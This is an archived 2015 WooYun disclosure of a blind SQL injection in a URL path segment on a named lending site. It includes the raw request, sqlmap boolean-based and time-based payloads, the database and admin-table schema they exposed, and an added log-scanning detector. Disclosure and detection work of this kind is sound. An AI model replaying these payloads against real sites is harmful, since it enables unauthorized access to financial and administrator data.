Defect ID: WooYun-2015-0128247
Title: P2P finance security: a haodai.com site has blind SQL injection exposing all sorts of admin data
Vendor: 好贷网 (haodai.com)
Author: 二维码
Submitted: 2015-07-22 07:34
Published: 2015-09-05 10:40
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 18
Status: Confirmed by vendor
Tags:
2015-07-22: Details sent to the vendor, awaiting vendor handling
2015-07-22: Vendor confirmed; details disclosed to the vendor only
2015-08-01: Details disclosed to core white hats and domain experts
2015-08-11: Details disclosed to regular white hats
2015-08-21: Details disclosed to intern white hats
2015-09-05: Details disclosed to the public
Luckily it is a boolean-based blind injection, so dumping runs at a decent speed. The tables hold all sorts of admin and amount data.
Injection point:
```http
GET /list/index/city/beijing*/xd_type/gouche/money/10/month/12.html HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://open.haodai.com:80/
Cookie: PHPSESSID=gc4u5iaklethl5v2c7ap443562; city=beijing; LANDING_PAGE=http%3A%2F%2Fopen.haodai.com%2F; desktop=0; REFERER=open.haodai.com; SOURCE_URL=http%3A%2F%2Fopen.haodai.com%2F
Host: open.haodai.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
```
```text
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://open.haodai.com:80/list/index/city/beijing') AND 2827=2827 AND ('IkuO'='IkuO/xd_type/gouche/money/10/month/12.html

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://open.haodai.com:80/list/index/city/beijing') AND (SELECT * FROM (SELECT(SLEEP(5)))WiVp) AND ('uRUa'='uRUa/xd_type/gouche/money/10/month/12.html
---
back-end DBMS: MySQL 5.0.12
available databases [2]:
[*] hd
[*] information_schema
```
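The injection here sits in a path segment (the `city` route value), so query-string filters never see it. As an added example (not code from the original report), the check below scans constructed access-log lines for the two payload shapes sqlmap reported above; the log lines, the route name and the indicator labels are assumptions:

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the report). Lines 2 and 3 carry the two sqlmap
# payload shapes shown above, URL-encoded as a client would send them in the path.
SAMPLE_LOG = """\
1.2.3.4 - - [22/Jul/2015:07:30:01 +0800] "GET /list/index/city/beijing/xd_type/gouche/money/10/month/12.html HTTP/1.1" 200 5123
1.2.3.4 - - [22/Jul/2015:07:30:02 +0800] "GET /list/index/city/beijing%27%29%20AND%202827%3D2827%20AND%20%28%27IkuO%27%3D%27IkuO/xd_type/gouche/money/10/month/12.html HTTP/1.1" 200 5123
1.2.3.4 - - [22/Jul/2015:07:30:03 +0800] "GET /list/index/city/beijing%27%29%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29WiVp%29%20AND%20%28%27uRUa%27%3D%27uRUa/xd_type/gouche/money/10/month/12.html HTTP/1.1" 200 5123
5.6.7.8 - - [22/Jul/2015:07:30:04 +0800] "GET /list/index/city/shanghai/xd_type/gouche/money/5/month/6.html HTTP/1.1" 200 4711
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<uri>\S+) HTTP/\d\.\d"')
# A city route value is a plain slug; anything else is suspicious on its own.
CITY_SLUG_RE = re.compile(r'^[a-z0-9_-]+$')
# Shapes from the report's payloads: quote/paren break-out plus boolean operator,
# self-comparing tautology (2827=2827, 'x'='x), and a timing function call.
INDICATORS = (
    ('boolean-operator', re.compile(r"['\"]\)?\s*(?:AND|OR)\s", re.IGNORECASE)),
    ('tautology', re.compile(r"(\d+)\s*=\s*\1\b|'(\w+)'\s*=\s*'\2\b")),
    ('time-delay', re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)),
)


def city_value(uri):
    """Return the URL-decoded route value that follows /city/ in the path, or None."""
    segments = uri.split('?', 1)[0].split('/')
    for i, seg in enumerate(segments[:-1]):
        if seg == 'city':
            return unquote(segments[i + 1])
    return None


def classify(value):
    """Label a decoded city value with every injection indicator it matches."""
    labels = [] if CITY_SLUG_RE.match(value) else ['not-a-slug']
    labels += [name for name, rx in INDICATORS if rx.search(value)]
    return labels


def scan_log(text):
    """Return (line number, decoded city value, labels) for each flagged request."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        value = city_value(m.group('uri')) if m else None
        labels = classify(value) if value is not None else []
        if labels:
            findings.append((n, value, labels))
    return findings
```

Decoding each segment before matching matters: the raw log line carries `%27%29%20AND`, which none of the patterns would hit.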
User:
```text
back-end DBMS: MySQL 5.0.12
current user: '[email protected]%'
```
admin table:
```text
back-end DBMS: MySQL 5.0.12
Database: hd
Table: admin
[24 columns]
+--------------+-----------------------+
| Column       | Type                  |
+--------------+-----------------------+
| agent_num    | char(12)              |
| agent_passwd | varchar(16)           |
| agent_phone  | varchar(16)           |
| auth         | varchar(1024)         |
| citys        | text                  |
| citys_iued   | text                  |
| email        | varchar(255)          |
| id           | int(10) unsigned      |
| isreadtj     | tinyint(1) unsigned   |
| iutypes      | text                  |
| menuid       | smallint(5) unsigned  |
| name         | varchar(32)           |
| pwd          | char(60)              |
| pwd_key      | varchar(32)           |
| qq           | char(11)              |
| relation     | int(10) unsigned      |
| role         | varchar(10)           |
| stat         | tinyint(3) unsigned   |
| tel          | char(11)              |
| tquin        | int(11) unsigned      |
| type         | tinyint(3) unsigned   |
| weixin       | char(32)              |
| xdtypes      | text                  |
| zone_id      | mediumint(8) unsigned |
+--------------+-----------------------+
```
It's late, so I won't dump the specific sensitive data; this is a financial site after all.
You are the experts on that.
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-07-22 10:38
Thanks.
None.
How did you know it was in that spot?
Why are the injection payloads for these online-lending sites all so similar?